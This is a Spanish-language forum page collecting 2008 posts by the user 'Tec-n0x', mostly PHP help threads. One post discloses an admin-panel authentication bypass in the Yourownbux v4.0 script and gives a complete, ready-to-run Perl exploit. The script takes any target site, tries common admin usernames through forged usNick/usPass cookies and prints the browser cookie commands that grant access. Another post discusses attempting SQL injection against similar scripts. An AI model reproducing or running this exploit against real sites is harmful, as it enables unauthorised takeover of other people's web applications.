Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Tec-n0x

#11
Cita de: ~Shinji~ en 13 Septiembre 2008, 17:51 PM
added :)

ps: are you the same as $pass = "Tec-n0x"; ? ;D

Yes, i Found the bug.

Link Milw0rm
#12
Edito el mensaje:

Puse el fix pero bueno mejor no :P

La solucion es Simple: Validar la cookie UsPass

~Shinji~  : If you still want the fix contact me via MSN.

#13
Bueno, esto lo descubri hace un par de dias .. Ahora lo publico.

Vulnerable: /admin/header.php

Código (php) [Seleccionar]

<?php
 
$user 
$_COOKIE["usNick"];
 
 $myDb-&gt;connect();
 
$sql "SELECT * FROM yob_users WHERE username='$user'";
 
$result mysql_query($sql);
 
$row mysql_fetch_array($result);
 
$myDb-&gt;close(); 
 
$is_admin $row['user_status'];
 
 if(
$is_admin != "admin"){
 
 $display_error "* You must login as administrator to access this page.";
 
 include ('error.php');  exit();
 
 }
 
?>


Como pueden ver, Solo se valida la cookie usNick, por lo tanto si tienes el usuario admin correcto, añadiendo las cookies puedes tener acceso al admin panel.

Y un pequeño Exploit para la explotacion es el siguiente:

Código (perl) [Seleccionar]

#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request;

#+-------------------------------------------------------------+-#
#+ Yourownbux v4.0                   --------------------------+--+
#+ Cookie Modification Exploit --------------------------++
#+ Discovered By: Tec-n0x | 04/9/2008 --------------------++
#
# + Gr33tz: OzX, Celciuz, N.O.X && All Friends --++
#+-------------------------------------------------------------+----#



system("clear");

print "
# Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com
\n# Thanks OzX\n\n";
print "Target [ Example: www.sitedemo.com ] :\n> ";
$target = <STDIN>;
chop($target);

if($target =~ m/www\.(.*)\.(.*)/) {

$other = $1;
check1($target);

} else {
print "\nInvalid Target.";
exit();
}

sub explote {

@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");
# Add Posible Users.

$check = shift;

foreach $user (@tryusers) {

$pass = "Tec-n0x";

print "\n\tTrying > $user\n";

$browser = LWP::UserAgent->new();
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");
$get = HTTP::Request->new(GET => $check);
$resp = $browser->request($get);
$content = $resp->content();

@code = split("\n",$content);

foreach $checka (@code) {

if($checka =~ m/Emails|Served|Workload|Overview/) {

system("clear");

print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:";

$vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;";
$vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;";

print "

+------------------------------------+
+ $vd\n+ $vda
+------------------------------------+
";


$yes = 1;

exit();

}
}
}

if($yes != 1) {

print "\n\n\nExploit Failed";

exit();

}

}
sub check1 {

$target = shift;

$check = "http\:\/\/$target\/admin\/index\.php";

$browser = LWP::UserAgent->new();
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
$get = HTTP::Request->new(GET => $check);
$resp = $browser->request($get);
$content = $resp->content();

@code = split("\n",$content);

foreach $checka (@code) {

if($checka =~ m/You must login as administrator to access this page/) {

print "Check 1 [ OK ]\n";

$success = 1;

explote($check);

}

}

if($sucess != 1) {

print "Failed";

exit();

}

}


El Post original, Clickeando Aqui.

Saludos
#14
Cita de: f3ler en  3 Septiembre 2008, 19:36 PM
Buenas tardes.

Como podria hacer SQL injection con este codigo PHP??:
$lole=$_COOKIE["usNick"];

$tabla = mysql_query("SELECT * FROM tb_users where referer='$lole' ORDER BY id ASC");


Un saludo.

Hola .. te cuento que yo tambien me pase un buen rato tratando de buscar SQL Injection en PTC's [ " Secure " bux / yourownbux / etc ] .. Y eso no funciona ..

Fijate que mas abajo lo que hace es para verificar con mysql_nums_rows o algo parecido ..

Si es donde yo pienso ..

Saludos
#15
Cita de: nachosaenz en 27 Agosto 2008, 21:37 PM
me ayudas no me sale la imagen del capcha en el navedador gracias por el aporte

Pusiste como esta en el posT?


<img src="nombre_del_archivo.php">
#16
PHP / Re: Ayuda para montar ptc
10 Agosto 2008, 21:54 PM
Cita de: 856 en 10 Agosto 2008, 08:09 AM
hola amigos me  gustaria si me pudieran ayudar para poder montar mi propia ptc por el momento en un servidor gratis, tengo los scripts pero hasta ahi llego :-[ espero sus respuestas

Es sencillo eso ..

El script que tienes trae un archivo con la consulta SQL .. seguro se llama " Database "

Vas a la base de datos de tu hosting .. y ejecutas la consulta ...

Configuras el " config.php " con los datos de tu BD y listo ..

;)
#17
PHP / Re: Sistema de consultas en PHP
10 Agosto 2008, 02:21 AM
Cita de: Cerdo en  9 Agosto 2008, 22:05 PM
La verdad que si, seria de gran ayuda tener el codigo hecho, porque soy muy novato en php y nunca antes habia intentado manejar bases de datos en otra cosa que no fueran archivos de TXT y suelo practica de codigos ya hechos y modificarlos para hacer pruebas y ganar experiencia, hombre no se si pudieran ayudarme a sacar el codigo o señalar una aplicacion pre fabricada con su autoria yo k se  >:(


ayuden a este pobre novato, gracias  :-[

Bueno, yo creo que una cosa es ayudarte con un codigo y otra prepararte el codigo.

http://phpya.com.ar
http://mysqlya.com.ar

Saludos
#18
Cita de: ^TiFa^ en  8 Agosto 2008, 23:07 PM
En Linux/Unix suele ser un poco mas interactivo. Solo se abre un terminal y nos logeamos a la terminal de perl, y a buscar driver o instalar   :D


bash-3.1# perl -MCPAN -e shell
CPAN: File::HomeDir loaded ok (v0.69)

cpan shell -- CPAN exploration and modules installation (v1.9205)
ReadLine support enabled                                         

cpan[1]>
cpan[2]> m BDB::mysql
No objects of type Module found for argument BDB::mysql

cpan[3]> m DBI
Module id = DBI
    DESCRIPTION  Generic Database Interface (see DBD modules)
    CPAN_USERID  TIMB (Tim Bunce <Tim.Bunce@pobox.com>)
    CPAN_VERSION 1.607
    CPAN_FILE    T/TI/TIMB/DBI-1.607.tar.gz
    DSLIP_STATUS MmcOp (mature,mailing-list,C,object-oriented,Standard-Perl)
    MANPAGE      DBI - Database independent interface for Perl
    INST_FILE    /usr/local/lib/perl5/site_perl/5.10.0/i686-linux/DBI.pm
    INST_VERSION 1.605


Gracias por eso .. no tenia idea de como se hacia ... en un rato cuando vaya al ubuntu lo probare ..

Saludos
#19
PHP / Re: Sistema de consultas en PHP
8 Agosto 2008, 14:10 PM
Cita de: Cerdo en  8 Agosto 2008, 01:37 AM
logre ver en la red el sistema exacto que pretendo manejar es este


http://www.fipcolombia.com/consultasVer.php

no se si pudieran checar el enlace y el tipo de formulario y datos y como se manejan, para poder darme una idea en codigo de como llevarlo a la practica, gracias.


tomemos en cuenta que cuando las consultas se envian en el form, no se publican inmediatamente, se envian a algun lugar y estoy casi seguro que al responderles se publican.

¿?

Te he dicho arriba exactamente lo que quieres ... No querras que te pongamos el codigo hecho verdad?   :-\
#20
PHP / Re: Sistema de consultas en PHP
7 Agosto 2008, 21:08 PM
Es sencillo ...

Pones un formulario pidiendo los datos:


<form action="2.php" method="POST">
Nombre: <input type="text" name="nombre">
Telefono: <input type="text" name="tel">


Y Luego en el otro archivo .. Recives los datos y los metes en la bd ...

Y Creas una columna llamada " approved " en la BD ...

Entonces, cuando alguien mande ... Le pones por default 0 .. y en el admin ..

Solo tienes que poner que cuando clickees en Aprovar .. con un update .. le ponga 1 al " approved "

y Luego con un bucle While ... muestras todos los registros de la bd ..

Y acuerdate pasar por htmlspecialchars / htmlentities las variables para evitar XSS / SQL Injection.

Saludos